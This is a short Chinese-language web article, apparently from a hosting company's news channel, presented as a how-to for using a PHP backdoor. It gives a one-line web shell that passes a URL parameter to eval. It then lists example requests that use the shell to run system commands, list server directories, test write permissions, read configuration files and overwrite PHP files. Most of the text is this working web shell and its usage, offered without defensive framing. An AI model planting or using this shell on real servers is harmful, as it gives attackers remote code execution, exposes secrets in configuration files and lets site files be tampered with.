PHP后门的使用方法?这个问题可能是我们日常学习或工作经常见到的。希望通过这个问题能让你收获颇深。下面是小编给大家带来的参考内容,让我们一起来看看吧!
首先,写一个最简单的后门,也可以叫做木马。
<?php eval($_GET['evl']);
就这样,你已经获得了这台服务器上的很多执行权限。
那场景的用法有哪些呢?
打印服务器phpinfo
http://www.test.com/a.php?evl=phpinfo()
查看某个目录下有什么文件
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));查看目录是否可写,接下里就可以在可写的目录里创建可执行文件了
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));获取某个文件的内容,一般用来读取配置
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));对某个可写目录进行写文件
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));感谢各位的阅读!看完上述内容,你们对PHP后门的使用方法大概了解了吗?希望文章内容对大家有所帮助。如果想了解更多相关文章内容,欢迎关注亿速云行业资讯频道。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
